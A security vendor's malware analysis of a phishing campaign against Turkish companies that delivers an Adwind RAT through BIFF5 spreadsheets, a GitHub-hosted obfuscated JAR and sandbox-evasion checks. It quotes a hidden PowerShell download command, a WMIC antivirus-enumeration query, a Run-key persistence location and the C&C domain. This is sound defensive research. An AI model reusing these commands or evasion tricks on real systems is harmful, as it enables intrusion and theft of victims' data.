Research by: Yohann Sillam and Daniel Alima
Check Point researchers are following an evolving, ongoing malspam campaign that is targeting more than 80 Turkish companies. The malware uses different evasive methods to bypass security solutions.
The initial attack vector starts with a phishing email that includes an Office file attachment. The file is in a 20-year old BIFF format, which cannot be parsed by common Office parser tools. In the next stage, a malicious Jar file is downloaded. This file is heavily obfuscated and carries several evasion techniques to avoid detection by security products. The jar file then drops an Adwind RAT, a multiplatform malware, which is configured to steal sensitive information and send it to the attacker Command and Control (C&C) server while gaining remote access to the victim’s machine.
All of these files have a very low detection rate in Virus Total, most likely due to the heavy obfuscation.
Subject: Hello. Yearly life insurance documents
Body: Attached is the document that is forwarded by Mrs. Asena, the responsible…
Waiting for your response …
I wish you success in your work.
The initial malicious documents are either XLS or CSV files. The XLS files contain an External Reference record, designed to trigger the download of a malicious JAR file:
The command: `
cmd /c powershell –executionpolicy bypass –W Hidden –command` aims at downloading a JAR file called zpmqwjs.docx
The Externsheet Injection is a rare technique that explains why the file was only detected by a small number of security vendors as shown in Figure 3 below:
Moreover, the attackers added many junk and special characters in the cell content and used a 20-year old BIFF version  (BIFF5) so the detection tool fails to parse the file. This is the error returned by the BiffView analysis tool:
The CSV file is used to download the same JAR via Formula injection technique.
Both of these vectors require user interaction to download the malicious JAR executable.
Github Pages, hosted under pages.github.com, is a static site hosting service by GitHub. It gives webmasters the ability to serve web documents directly from their GitHub repositories to their websites. The attacker responsible for this campaign created a website with GitHub Pages service to distribute the malware samples hosted in their repositories.
One user associated with the GitHub repositories is named “5308682.” This account is associated with 18 different repositories. The current repository used for this campaign is “ofxamz19.”
However, the majority of the files hosted by the attacker were variants of the same malicious JAR file, under different filenames: “wucgy3jecwgpv.svg”, “6da7uj4b4oi2a.pdf”, “zpmqwjs.docx” and more.
Talos and Sophos reported earlier stages of the campaign. We noticed an evolution of this campaign, showing that the attackers are constantly improving their technique to maintain a low detection rate.
The dropper and payload files were obfuscated and only detected by a few security vendors. None of the tools we considered was able to decompile it entirely (JD-GUI, Fernflower, CFR, Procyon … see Figure 7 for example).
The Figure 9 represents the decompiled code of the dropper. The calls of all functions are embedded into a decryption function (Gv) and comparisons are performed between encrypted values.
From Figure 7, we estimated that the best solution to analyze this JAR file was to debug it from the bytecodes. The arguments of all static functions (including decryption function) called during runtime were encrypted and so was the output. All interesting function calls ran through dynamic invoke.
The relationship between `Gv` function and `findStatic`, `findDynamic` of Java language helped to identify `Gv` as the main decryption function.
Compared to previous versions of the campaign, the malware performs several new evasion techniques to fool generic emulation sandboxes:
Then, the malware connects to checkip.amazonaws.com to collect the public IP. It queries ipinfo.io/public_ip/country to check if the country associated with the IP is Turkey.
If any of these conditions is not met, the malware will not show its true behavior.
Then, the payload will search for Anti Viruses via WMIC.exe and sends this information to the CnC server.
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`
Windows utility Attrib.exe will be used to make the payload a hidden file.
The malware author put some effort into finding an attractive icon and a name (Uninstall) that wouldn’t raise suspicion. The malware is associated with a Windows object. Double-clicking the malware icon starts up the control panel board Figure 11 in order to mislead the victim. Indeed, double clicking the icon will not start any malicious behavior. However, starting the file with Java program will start the info stealing.
Older version of the malware were associated with the Trash folder instead.
The registry key written in at `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` ensures the persistence of the malware after machine restarts.
After running through all the evasion mechanisms presented in the previous section, the malware tries to connect to 21736.xyz on port 1505 (TCP):
The picture above represents the dashboard of the standard version of Adwind 3.0. This board gives to the attacker the following abilities:
As part of the Check Point SandBlast Zero-Day Protection solution, SandBlast Network prevents these attacks. This innovative zero-day threat sandboxing capability within the SandBlast solution delivers the best possible catch rate for these threats.
SandBlast Network Protections:
IPS protections :
We would like to thank our colleague, Itay Cohen for his precious contribution in this research.